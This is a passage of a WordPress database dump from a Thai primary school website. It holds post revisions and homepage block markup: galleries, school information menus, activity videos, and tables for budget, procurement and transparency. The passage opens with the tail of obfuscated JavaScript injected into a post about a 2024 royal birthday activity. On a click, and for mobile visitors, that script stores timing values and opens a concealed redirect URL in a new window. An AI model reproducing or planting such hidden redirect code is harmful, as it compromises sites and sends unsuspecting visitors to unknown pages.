_0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','กิจกรรมเฉลิมพระเกียรติพระบาทสมเด็จพระเจ้าอยู่หัว เนื่องในโอกาพระราชพิธีมหามงคลเฉลิมพระชนพรรษา 6 รอบ 28 กรกฎาคม 2567','','inherit','closed','closed','','245-revision-v1','','','2024-07-28 23:07:59','2024-07-28 16:07:59','',245,'http://pakhaeng.ssk.in.th/?p=269',0,'revision','',0),
(271,1,'2024-07-30 09:57:01','2024-07-30 02:57:01','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_5a5d38-a9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_5a5d38-a9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"backgroundColor\":\"white\",\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\",\"flexWrap\":\"wrap\",\"justifyContent\":\"left\"}} -->\n<div class=\"wp-block-group has-white-background-color has-background\"><!-- wp:generateblocks/headline {\"uniqueId\":\"0ec6139a\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"22px\"},\"backgroundColor\":\"#3bd6e3\",\"iconColor\":\"#8ed1fc\"} -->\n<h2 class=\"gb-headline gb-headline-0ec6139a gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"487bd449\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"19bd4464\",\"columns\":2,\"horizontalGap\":20,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"2cef18b9\",\"isGrid\":true,\"gridId\":\"19bd4464\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:video {\"id\":138} -->\n<figure class=\"wp-block-video\"><video controls poster=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/448905004_973201524597519_7994539186753533290_n-1.jpg\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/สุนทนภู่.mp4\"></video></figure>\n<!-- /wp:video -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"66a01ab5\",\"isGrid\":true,\"gridId\":\"19bd4464\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:video {\"id\":142} -->\n<figure class=\"wp-block-video\"><video controls poster=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/Untitled.png\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/สุขาดี.mp4\"></video></figure>\n<!-- /wp:video -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#6096b4\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} 